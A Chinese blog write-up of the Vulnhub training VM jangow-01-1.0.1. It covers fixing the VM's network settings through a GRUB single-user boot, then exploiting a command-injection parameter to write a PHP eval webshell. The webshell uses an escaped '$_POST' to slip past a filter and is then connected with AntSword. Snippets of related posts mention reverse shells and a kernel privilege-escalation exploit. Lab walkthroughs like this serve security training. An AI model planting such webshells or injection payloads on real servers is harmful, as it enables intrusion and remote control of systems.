jangow-01-1.0.1

靶机IP获取与命令执行漏洞利用
最新推荐文章于 2025-07-27 14:57:26 发布
原创 最新推荐文章于 2025-07-27 14:57:26 发布 · 239 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络

首先kali终端运行以下命令查看靶机ip

这里我们发现并没有查到靶机的ip,这时我们重启靶机

打开靶机,按下shift,出现下图界面

再次按下e键,进入到如下界面

将ro替换为rw signie init=/bin/bash

替换完毕后,按下Ctrl键+X键,进入如下页面

输入vi /etc/network/interfaces编辑网卡信息,改完后按shift+?键才能输出保存,修改完成后重启靶机即可

然后来到kali终端,继续运行以下命令查看靶机ip

这样我们就可以得到靶机的ip了

浏览器访问此ip

点击site文件夹,网页跳转

把所有的功能点都点一遍,当我们点击Buscar时,出现以下页面,发现有传参的地方

输入命令看看能不能执行,发现成功解析

那么我们就可以确定该处存在命令执行漏洞

尝试将一句话木马写入文件中,具体代码如下

echo "<?php @eval($_POST[a]);?>" > 1.php

再次写入一个1.txt文件,测试是否成功写入

echo "<?php @eval($_POST[a]);?>" > 1.txt

接下来访问这个文件,发现传参方式被过滤

可以在被过滤的地方加一个反斜杠,再次写入

echo "<?php @eval(\$_POST[a]);?>" > 1.txt

再次访问1.txt,测试可以成功写入

修改后缀名为1.php,重新写入

echo "<?php @eval(\$_POST[a]);?>" > 1.php

尝试访问1.php,蚁剑连接

连接成功,获取getshell

An_anQ
关注
Vulnhub靶机:jangow-01-1.0.1
qq_48904485的博客
01-03 702
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:jangow0110.0.2.4)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/
【Vulnhub靶场】JANGOW: 1.0.1
DG_s1mple
01-21 2846
时隔这么久,终于开始做题了 环境准备 下载靶机,导入到virtualBox里面,这应该不用教了吧 开机可以看到,他已经给出了靶机的IP地址,就不用我们自己去探测了 攻击机IP地址为:192.168.2.14 靶机IP地址为:192.168.2.16 渗透过程 信息收集 万事第一步,先扫描 可以看到,靶机目前就只开放了两个端口,一个是21一个是80,首先访问80端口 发现是有网页的,随便点点,看看有没有能注入或者渗透的点 发现点到Buscar时,页面变得不一样,并且网址出现了可疑的后缀 我们试着运行一
vulnhub靶机:jangow-01-1.0.1
weixin_68416970的博客
08-08 782
保存下面代码为一个 php 文件,重命名为 test.php,上传到靶机的 /var/www/html/site/ 目录下。因为靶机的原因无法使用监听端口的方法传输文件,直接把 45010.c 从 kali 拖到本机桌面,再用蚁剑上传。修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)因为我 kali 的小 bug,这里输入的命令会显示双写,但是不影响命令执行。在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。
Vulnhub靶场,超详细jangow-01-1.0.1靶机复现过程
cjchsh的博客
11-06 1025
整理一下我们的上面过程的信息收集,从最开始的端口扫描,我们扫出来了21端口,80端口,再到目录扫描,我们扫到了一些目录,比如wordpress目录,js目录,assets目录,如下图这些目录,还有两套密码,一套是wordpress的,但是我们找不到后台,还有一套密码,不知道是干啥的,我们试一下21端口,用那套密码连接一下.所以,我们试试传点参数,看看页面有没有回显或者变化.我们传个id进去试试他把咱们传的id带进来了,说明这里没有对我们传入的参数进行限制,那我们就可以传入比如一句话木马了嘻嘻。
Vulnhub-jangow-01-1.0.1通关攻略
m0_66808441的博客
03-25 384
在此页面按下e键,进入如下界面, 将ro 替换为 rw signie init=/bin/bash。编辑配置文件网卡信息, 英文键盘的斜杠按不出来,需要按数字键盘的斜杠。替换完毕后,按下Ctrl键+X键,进入如下页面。打开靶机,按下shift,出现下图界面。ip a查看网卡信息。
jangow-01-1.0.1靶机渗透测试
weixin_58786230的博客
07-12 375
【代码】jangow-01-1.0.1靶机渗透测试。
jangow-01-1.0.1靶机
最新发布
2302_77710417的博客
07-27 287
我们发现只能扫描出主机的IP,可能是虚拟网卡配置的问题。尝试去修改一下虚拟网卡配置问题。重启虚拟机,在启动时按住shift,出现了下面这个界面后按e,然后找到ro修改成rw single init=/bin/bash。修改完后按Ctrl + X ,输入ip a 查看网卡ens33,然后cd 到etc/network,然后vim interfaces。修改内容如下图。(注意:要一级一级去cd)这样就可以扫描到我们的ip和端口了。访问一下主页。
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1318
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
jangow-01-1.0.1 靶机渗透
braty_的博客
04-06 438
看了一些大佬的wp,发现该靶机只能用443端口,防火墙做了限制。
VulnHub之JANGOW-01-1.0.1渗透
m0_73481504的博客
03-06 486
1.了解命令执行漏洞2.一句话木马,反弹shell3.中国蚁剑的使用4.Ubuntu 4.4.0-31漏洞利用。
jangow-01-1.0.1靶机复盘
weixin_44681307的博客
07-09 236
为什么要说防火墙,后来才发现这个靶机设置了防火墙,只有允许的端口允许的命令才可以用,其他的都不能用,包括端口也只有443端口被允许通过。因为nc -e不能用,所以就在网上找了个反弹shell的命令,这里要注意的是只有443端口能用,别的端口都不能用。在网址后面随便输入ls命令,发现可以用,经过尝试发现这里可以注入代码,但是有一些命令被禁用了,比如nc。搜了一圈发现有两个php文件挺可疑,就发送到自己电脑上了,实际后面没啥用,ftp也没啥用。测试后发现是可以的,代码不见了,说明被执行了。
jangow-01-1.0.1靶机复现
weixin_62162207的博客
07-30 464
jangow-01-1.0.1靶机复现
vulnhub——jangow-01-1.0.1靶机渗透 超详细
qq_48368964的博客
07-31 604
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)重启进入系统,使用刚才修改的root密码进入root权限。
jangow-01-1.0.1靶机漏洞解析
qq_64470109的博客
03-24 406
因为这个靶机原本是在virtualBOX运行的,如果我们在VM运行的话可能会发送冲突,导致扫不到靶机IP,所以需要给靶机修改一下配置。既然可以传送1.txt,那我们去尝试传入一句话木马到1.php中。点到Buscar之后,在URL发现有传参的地方。在网页中输入一个123,输入到1.txt中。扫到IP为192.168.19.163。没报错,说明我们的php文件已经上传了。发现可以成功传入1.txt。成功反弹到shell。
jangow-01-1.0.1靶机攻略
2301_81383433的博客
03-24 391
按e进入编辑模式 ,将ro 替换为 rw signie init=/bin/bash。最后按shift+?然后输入wq点击回车退出,重启靶场。在系统启动时(⻓按shift键)直到显示以下界⾯。ip a查看网卡信息,修改配置文件网卡信息,回车。发现url中存在参数,尝试写入一句话木马。之后按下Ctrl键+X键,进入如下页面。和Kali一样,设为NAT。虚拟终端写入反弹语句。
重现经典:jswdk-1.0.1-Java Web服务器探究
标题中提到的"jswdk-1.0.1-java web服务器"指的是一个特定版本的Java Web服务器开发工具包(JavaServer Web Development Kit),版本为1.0.1。这个工具包是由Sun Microsystems公司(后来被Oracle收购)开发的,用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值